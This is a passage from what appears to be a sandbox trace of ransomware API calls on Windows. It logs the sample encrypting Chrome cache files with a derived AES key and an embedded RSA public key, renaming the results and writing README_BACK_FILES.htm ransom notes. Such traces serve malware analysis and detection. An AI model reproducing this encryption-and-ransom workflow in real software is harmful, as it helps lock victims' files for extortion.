| out: phKey=0x2b9c380*=0x2e7ef00) returned 1 [0265.056] CryptEncrypt (in: hKey=0x2e7ef00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0265.056] CryptEncrypt (in: hKey=0x2e7ef00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76ed0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e76ed0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0265.057] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e76ed0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e76ed0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0265.058] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x5a, lpOverlapped=0x0) returned 1 [0265.059] CryptEncrypt (in: hKey=0x2e7ea00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x5a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0265.059] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0265.059] CloseHandle (hObject=0x5d50) returned 1 [0265.059] CloseHandle (hObject=0x5d64) returned 1 [0265.060] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt"), bFailIfExists=0) returned 1 [0265.063] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt", dwFileAttributes=0x0) returned 1 [0265.064] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg")) returned 1 [0265.065] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.fuck")) returned 1 [0265.066] CryptDestroyHash (hHash=0x2e7e9c0) returned 1 [0265.066] CryptDestroyKey (hKey=0x2e7ea00) returned 1 [0265.066] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0265.066] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0265.066] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0265.067] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\readme_back_files.htm")) returned 0xffffffff [0265.067] AreFileApisANSI () returned 1 [0265.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0265.067] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.068] GetFileType (hFile=0x5d4c) returned 0x1 [0265.068] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0265.069] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.069] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e7fc00 [0265.084] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.084] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.085] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7e9c0 [0265.089] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.090] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7eb40 [0265.102] FindNextFileA (in: hFindFile=0x2e7eb40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0265.102] FindNextFileA (in: hFindFile=0x2e7eb40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0265.102] FindNextFileA (in: hFindFile=0x2e7eb40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0265.102] FindClose (in: hFindFile=0x2e7eb40 | out: hFindFile=0x2e7eb40) returned 1 [0265.103] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\readme_back_files.htm")) returned 0xffffffff [0265.104] AreFileApisANSI () returned 1 [0265.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2edddf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 207 [0265.104] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.121] GetFileType (hFile=0x5d50) returned 0x1 [0265.121] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0265.122] FindNextFileA (in: hFindFile=0x2e7e9c0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0265.122] FindClose (in: hFindFile=0x2e7e9c0 | out: hFindFile=0x2e7e9c0) returned 1 [0265.123] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\readme_back_files.htm")) returned 0xffffffff [0265.123] AreFileApisANSI () returned 1 [0265.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eddfa0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 197 [0265.123] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0265.124] GetFileType (hFile=0x5d64) returned 0x1 [0265.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0265.125] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.125] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7eec0 [0265.136] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.136] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.137] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.138] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.138] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.138] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.138] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.138] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7f000 [0265.145] FindNextFileA (in: hFindFile=0x2e7f000, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0265.145] FindNextFileA (in: hFindFile=0x2e7f000, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0265.146] FindNextFileA (in: hFindFile=0x2e7f000, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0265.146] FindClose (in: hFindFile=0x2e7f000 | out: hFindFile=0x2e7f000) returned 1 [0265.146] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\readme_back_files.htm")) returned 0xffffffff [0265.147] AreFileApisANSI () returned 1 [0265.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2edda90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 207 [0265.147] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.150] GetFileType (hFile=0x5d50) returned 0x1 [0265.150] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0265.152] FindNextFileA (in: hFindFile=0x2e7eec0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0265.152] FindClose (in: hFindFile=0x2e7eec0 | out: hFindFile=0x2e7eec0) returned 1 [0265.152] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\readme_back_files.htm")) returned 0xffffffff [0265.152] AreFileApisANSI () returned 1 [0265.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2edd808, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 197 [0265.152] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0265.153] GetFileType (hFile=0x5d64) returned 0x1 [0265.154] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0265.165] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.165] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0265.165] GetLastError () returned 0x0 [0265.165] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt")) returned 0x20 [0265.167] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt", dwFileAttributes=0x80) returned 1 [0265.168] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0265.169] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.171] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg", dwFileAttributes=0x2) returned 1 [0265.171] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0265.174] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0265.174] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.174] CryptHashData (hHash=0x2e7ea00, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.174] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7ea00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7ec80) returned 1 [0265.174] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.174] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0265.174] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e76dc0) returned 1 [0265.175] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76dc0, dwCertEncodingType=0x1, pInfo=0x2eb16c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb16f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb16f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7f040) returned 1 [0265.175] CryptEncrypt (in: hKey=0x2e7f040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0265.175] CryptEncrypt (in: hKey=0x2e7f040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76f58*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e76f58*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0265.175] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e76f58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e76f58*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0265.181] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x5a, lpOverlapped=0x0) returned 1 [0265.182] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x5a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0265.183] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0265.183] CloseHandle (hObject=0x5d64) returned 1 [0265.183] CloseHandle (hObject=0x5d50) returned 1 [0265.183] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service 